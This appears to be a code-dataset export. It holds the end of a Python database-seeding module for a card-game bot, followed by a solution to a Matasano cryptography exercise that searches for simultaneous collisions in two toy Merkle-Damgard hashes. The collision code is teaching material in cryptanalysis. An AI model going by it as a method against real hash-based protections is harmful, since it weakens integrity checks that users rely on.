                fields.update(common=2, rare=1)
            else:
                fields.update(uncommon=2, rare=1)
        elif rank < 26:
            fields["kamas"] = (rank - 10) * 10
            if rank < 21:
                fields.update(uncommon=2, rare=1)
            else:
                fields.update(uncommon=2, krosmic=1)
        elif rank == 30:
            # Reaching the top numbered rank also grants the Veteran trophy.
            fields.update(uncommon=2, infinite=1, kamas=300,
                          trophy=Trophy.VETERAN.value)
        else:
            fields["kamas"] = (rank - 19) * 25
            fields.update(uncommon=2, infinite=1)
        with laima_db.transaction():
            Rank.create(**fields)
    # Podium ranks share the same rewards and differ only by trophy; all
    # five are created inside a single transaction, as before.
    podium = (("Top 100", Trophy.TOP100.value),
              ("Top 20", Trophy.TOP20.value),
              ("3rd", Trophy.THIRD.value),
              ("2nd", Trophy.SECOND.value),
              ("1st", Trophy.FIRST.value))
    with laima_db.transaction():
        for label, trophy in podium:
            Rank.create(number=label,
                        uncommon=2,
                        infinite=1,
                        kamas=300,
                        trophy=trophy)
def init_card_and_tag(directory):
    """Import every card JSON file found in *directory* into the database.

    Args:
        directory: path of a directory containing one JSON file per card.
    """
    for filename in os.listdir(directory):
        # Progress output: importing many card files can take a while.
        print(filename)
        # os.path.join is portable, unlike manual "/" concatenation.
        filepath = os.path.join(directory, filename)
        json_to_card_and_tag(filepath)
def json_to_card_and_tag(filepath):
    """Import one card JSON file into the CardData, CardText and Tag tables.

    Creates the CardData row, then one CardText row per supported language
    together with search tags derived from the localized card name.

    Args:
        filepath: path of the JSON file describing a single card.
    """
    # Infinite cards (Rarity == 4) encode their level as the final digit
    # of their internal name.
    inf_lvl_regex = re.compile(r"\d$")
    # Matches <b> and </b>; both are replaced by the Markdown marker "**".
    bold_regex = re.compile(r"<.?b>")
    # Explicit encoding so the import does not depend on the platform
    # default (card files may contain non-ASCII text).
    with open(filepath, 'r', encoding='utf-8') as file_data:
        data = json.load(file_data)
    name = {}
    tags = {}
    desc = {}
    families = ','.join(str(fam) for fam in data["Families"])
    infinite_level = None
    if data["Rarity"] == 4:
        inf_lvl = inf_lvl_regex.search(data["Name"]).group(0)
        infinite_level = int(inf_lvl)
    for language, __ in languages:
        name[language] = data["Texts"]["Name" + language]
        # Tags are the ASCII-folded, lower-cased words of the card name.
        tags[language] = unidecode.unidecode(name[language]).lower().split()
        # Collapse all whitespace runs, then convert HTML bold to Markdown.
        desc[language] = ' '.join(data["Texts"]["Desc" + language].split())
        desc[language] = bold_regex.sub("**", desc[language])
        if data["Rarity"] == 4:
            # Make the infinite level searchable as its own tag.
            tags[language].append(inf_lvl)
    with laima_db.transaction():
        card_data = CardData.create(card_id=data["Name"],
                                    card_type=data["CardType"],
                                    ap_cost=data["CostAP"],
                                    life=data["Life"],
                                    attack=data["Attack"],
                                    movement_point=data["MovementPoint"],
                                    extension=data["Extension"],
                                    families=families,
                                    god=data["GodType"],
                                    rarity=data["Rarity"],
                                    infinite_level=infinite_level,
                                    is_token=data["IsToken"])
        for language, lang_id in languages:
            card_text = CardText.create(card_data=card_data,
                                        name=name[language],
                                        description=desc[language],
                                        lang=lang_id)
            for tag in tags[language]:
                # get_or_create returns (row, created); only the row is needed.
                tag_row = Tag.get_or_create(name=tag)[0]
                CardTextTag.create(cardtext=card_text, tag=tag_row)
def init_rss_feeder():
    """Create one RssFeeder row per supported language."""
    with laima_db.transaction():
        for _language_name, language_id in languages:
            RssFeeder.create(lang=language_id)
def init_twitter_feeder():
    """Create one TwitterFeeder row per supported language."""
    with laima_db.transaction():
        for _language_name, language_id in languages:
            TwitterFeeder.create(lang=language_id)
| gpl-3.0 | 9,206,986,548,832,388,000 | 26.351293 | 122 | 0.505713 | false | 3.621861 | false | false | false |
shainer/matasano | set7/ch52_part2.py | 1 | 1575 | #!/usr/bin/python3
from Crypto.Cipher import AES
from Crypto.Cipher import Blowfish
import math
import itertools
from ch52 import *
def F(message):
    """Hash *message* with the narrow Merkle-Damgard construction from
    ch52, using a fixed 2-byte initial state.
    """
    padded = padPKCS7(message)
    return MerkleDamgard(padded, state=b'\x07\x87', stateLen=2)
def G(message, state=b'\x00\x00', stateLen=3):
    """Merkle-Damgard hash like F, but with a wider state, a different
    initial state, and Blowfish instead of AES: the padded running state
    keys a Blowfish-ECB encryption of each message block, and the
    truncated ciphertext becomes the next state.
    """
    running_state = padPKCS7(state)
    for block_index in range(GetNumBlocks(message)):
        cipher = Blowfish.new(running_state, Blowfish.MODE_ECB)
        running_state = cipher.encrypt(GetBlock(message, block_index))
        # Truncate to the state size, then pad back up to a valid key.
        running_state = padPKCS7(running_state[:stateLen])
    return running_state[:stateLen]
def H(message):
    """Concatenation of the F and G digests; a collision in H requires a
    simultaneous collision in both underlying hashes.
    """
    f_digest = F(message)
    g_digest = G(message)
    return f_digest + g_digest
def FindGCollisions(collisions):
    """Return the messages in *collisions* whose G-digest is shared with
    at least one other message in the list (i.e. collisions in G too).
    """
    buckets = {}
    for message in collisions:
        buckets.setdefault(G(message), []).append(message)
    surviving = []
    for group in buckets.values():
        if len(group) > 1:
            surviving.extend(group)
    return surviving
if __name__ == '__main__':
    state_len = 2
    # F's state is only 2 bytes wide, so large batches of collisions are
    # cheap to generate.
    f_collisions = FindCollisions(state_len, 8192, b'\x07\x87')
    print('Found %d collisions for F' % len(f_collisions))
    if VerifyCollisions(f_collisions, b'\x07\x87'):
        # Keep only those F-collisions that also collide in G.
        g_collisions = FindGCollisions(f_collisions)
        if g_collisions:
            print('[**] Found collisions for both F and G:', g_collisions)
        else:
            print('[**] Collisions were only valid for F')
    else:
        print('!! Error')
| gpl-3.0 | 6,155,153,189,169,903,000 | 24 | 71 | 0.707937 | false | 2.84296 | false | false | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.